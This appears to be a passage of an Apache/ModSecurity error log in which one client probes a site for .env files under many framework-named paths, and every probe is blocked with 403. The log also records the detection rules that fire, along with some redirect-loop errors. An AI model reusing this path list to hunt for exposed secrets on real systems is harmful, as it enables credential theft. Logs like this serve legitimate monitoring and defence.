[Mon May 11 14:10:16.028659 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/user-panel/.env"] [unique_id "agHHKOJEyNRN152ArORzewAAAFI"]
[Mon May 11 14:10:16.312516 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHHKOJEyNRN152ArORzfAAAAFI"]
[Mon May 11 14:10:16.312953 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHHKOJEyNRN152ArORzfAAAAFI"]
[Mon May 11 14:10:16.313186 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHHKOJEyNRN152ArORzfAAAAFI"]
[Mon May 11 14:10:16.313503 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHHKOJEyNRN152ArORzfAAAAFI"]
[Mon May 11 14:10:16.531130 2026] [core:error] [pid 1319953:tid 1319971] [client 52.242.216.199:21730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:16.531174 2026] [core:error] [pid 1319953:tid 1319971] [client 52.242.216.199:21730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:16.617352 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHHKOJEyNRN152ArORzfgAAAFI"]
[Mon May 11 14:10:16.617757 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHHKOJEyNRN152ArORzfgAAAFI"]
[Mon May 11 14:10:16.617953 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHHKOJEyNRN152ArORzfgAAAFI"]
[Mon May 11 14:10:16.618264 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHHKOJEyNRN152ArORzfgAAAFI"]
[Mon May 11 14:10:16.908288 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHHKOJEyNRN152ArORzfwAAAFI"]
[Mon May 11 14:10:16.908667 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHHKOJEyNRN152ArORzfwAAAFI"]
[Mon May 11 14:10:16.908848 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHHKOJEyNRN152ArORzfwAAAFI"]
[Mon May 11 14:10:16.909089 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHHKOJEyNRN152ArORzfwAAAFI"]
[Mon May 11 14:10:17.197810 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHHKeJEyNRN152ArORzgAAAAFI"]
[Mon May 11 14:10:17.198204 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHHKeJEyNRN152ArORzgAAAAFI"]
[Mon May 11 14:10:17.198403 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHHKeJEyNRN152ArORzgAAAAFI"]
[Mon May 11 14:10:17.198631 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHHKeJEyNRN152ArORzgAAAAFI"]
[Mon May 11 14:10:17.452413 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHHKeJEyNRN152ArORzgQAAAFI"]
[Mon May 11 14:10:17.452800 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHHKeJEyNRN152ArORzgQAAAFI"]
[Mon May 11 14:10:17.452992 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHHKeJEyNRN152ArORzgQAAAFI"]
[Mon May 11 14:10:17.453238 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHHKeJEyNRN152ArORzgQAAAFI"]
[Mon May 11 14:10:17.716848 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHHKeJEyNRN152ArORzgwAAAFI"]
[Mon May 11 14:10:17.717276 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHHKeJEyNRN152ArORzgwAAAFI"]
[Mon May 11 14:10:17.717460 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHHKeJEyNRN152ArORzgwAAAFI"]
[Mon May 11 14:10:17.717723 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHHKeJEyNRN152ArORzgwAAAFI"]
[Mon May 11 14:10:18.006932 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHHKuJEyNRN152ArORzhAAAAFI"]
[Mon May 11 14:10:18.007320 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHHKuJEyNRN152ArORzhAAAAFI"]
[Mon May 11 14:10:18.007522 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHHKuJEyNRN152ArORzhAAAAFI"]
[Mon May 11 14:10:18.007754 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHHKuJEyNRN152ArORzhAAAAFI"]
[Mon May 11 14:10:18.301606 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHHKuJEyNRN152ArORzhgAAAFI"]
[Mon May 11 14:10:18.302095 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHHKuJEyNRN152ArORzhgAAAFI"]
[Mon May 11 14:10:18.302325 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHHKuJEyNRN152ArORzhgAAAFI"]
[Mon May 11 14:10:18.302642 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHHKuJEyNRN152ArORzhgAAAFI"]
[Mon May 11 14:10:18.387460 2026] [core:error] [pid 1319886:tid 1319936] [client 52.242.216.199:21648] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:18.387487 2026] [core:error] [pid 1319886:tid 1319936] [client 52.242.216.199:21648] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:18.572366 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHHKuJEyNRN152ArORzjAAAAFI"]
[Mon May 11 14:10:18.572784 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri 